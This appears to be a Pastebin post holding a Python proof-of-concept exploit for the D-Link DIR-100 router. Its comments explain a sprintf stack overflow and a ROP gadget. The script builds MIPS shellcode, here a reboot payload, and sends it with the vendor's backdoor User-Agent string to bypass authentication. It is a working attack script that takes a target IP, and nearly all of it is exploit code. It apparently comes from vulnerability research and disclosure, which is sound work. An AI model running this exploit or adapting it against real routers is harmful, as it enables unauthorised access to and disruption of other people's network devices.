Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

D-Link Backdoor Stack Overflow PoC DIR-100 v1.13

By: a guest on Oct 14th, 2013  |  syntax: Python  |  size: 3.76 KB  |  views: 12,820  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/usr/bin/env python
  2. ###################################################################################################################
  3. # PoC exploit code for DIR-100 revA, v1.13
  4. # ftp://ftp.dlink.eu/Products/dir/dir-100/driver_software/DIR-100_fw_reva_113_ALL_en_20110915.zip
  5. # Tested in an emulator, but should work on the real thing.
  6. #
  7. # A sprintf stack overflow exists in the RuntimeDiagnosticPing function inside /bin/webs. This is also
  8. # theoretically suceptable to command injection, but there are few useful commands that can be executed (
  9. # not even 'reboot'). Further, data is not URL deocded prior to the sprintf, spaces cannot be used in the GET
  10. # reuqest URL, and the $IFS environment variable does not seem to be set in the limited /bin/sh shell; thus,
  11. # it would be difficult, if possible at all, to inject commands that take arguments.
  12. #
  13. # This is a simple ROP into the stack. After the sprintf, popen("ping -c 1 %s", "r") is called three times,
  14. # which should be more than enough to ensure that the data cache has been flushed back to main memory (thus
  15. # no need to ROP to a blocking call, such as sleep). Further, at return the $s5 register conveniently has a
  16. # pointer to the user-supplied data on the stack, so we just return to offset 0x3243C in libc which puts
  17. # the contents of $s5 into $t9 and then jumps to the address in $t9:
  18. #
  19. #       .text:0003243C                 move    $t9, $s5
  20. #       .text:00032440                 jalr    $t9
  21. #       .text:00032444                 nop
  22. #
  23. # Some known bad bytes that will cause the exploit to fail if they are contained in your request (there is no URL
  24. # decoding!): '/', '?', '&', '=', '\r', '\n'
  25. #
  26. # Craig Heffner
  27. # Tactical Network Solutions
  28. ###################################################################################################################
  29.  
  30. import sys
  31. import urllib2
  32.  
  33. try:
  34.         url = 'http://%s/Tools/tools_misc.xgi?domain=a&set/runtime/diagnostic/pingIp=' % sys.argv[1]
  35. except Exception, e:
  36.         print str(e)
  37.         print 'Usage: %s <target ip>' % sys.argv[0]
  38.         sys.exit(1)
  39.  
  40. # This is the actual payload; here it is a simple reboot shellcode.
  41. # This payload size is limited to about 200 bytes, otherwise you'll crash elsewhere in /bin/webs.
  42. payload  = "\x3c\x06\x43\x21" # lui     a2,0x4321
  43. payload += "\x34\xc6\xfe\xdc" # ori     a2,a2,0xfedc
  44. payload += "\x3c\x05\x28\x12" # lui     a1,0x2812
  45. payload += "\x34\xa5\x19\x69" # ori     a1,a1,0x1969
  46. payload += "\x3c\x04\xfe\xe1" # lui     a0,0xfee1
  47. payload += "\x34\x84\xde\xad" # ori     a0,a0,0xdead
  48. payload += "\x24\x02\x0f\xf8" # li      v0,4088
  49. payload += "\x01\x01\x01\x0c" # syscall 0x40404
  50.  
  51. # The payload is split up; some of it before the return address on the stack, some after.
  52. # This little snippet skips over the return address during execution.
  53. # It assumes that your shellcode will not be using the $fp or $t9 registers.
  54. move_sp_fp = "\x03\xa0\xf0\x21" # move $fp, $sp
  55. jump_code =  "\x27\xd9\x02\xd4" # addiu $t9, $fp, 724
  56. jump_code += "\x03\x21\xf8\x08" # jr $t9
  57. jump_code += "\x27\xE0\xFE\xFE" # addiu $zero, $ra, -0x102
  58.  
  59. # Stitch together the payload chunk(s) and jump_code snippet
  60. shellcode_p1 = move_sp_fp + payload[0:68] + jump_code + "DD"
  61. if len(shellcode_p1) < 86:
  62.         shellcode_p1 += "D" * (86 - len(shellcode_p1))
  63.         shellcode_p2 = ""
  64. else:
  65.         shellcode_p2 = "DD" + payload[68:]
  66.  
  67. # Build the overflow buffer, with the return address and shellcode
  68. # libc.so base address and ROP gadget offset for the DIR-100, revA, v1.13
  69. # libc_base = 0x2aaee000
  70. # ret_offset = 0x3243C
  71. buf = shellcode_p1 + "\x2A\xB2\x04\x3C" + shellcode_p2
  72.  
  73. # Normally only admins can access the tools_misc.xgi page; use the backdoor user-agent to bypass authentication
  74. req = urllib2.Request(url+buf, headers={'User-Agent' : 'xmlset_roodkcableoj28840ybtide'})
  75. urllib2.urlopen(req)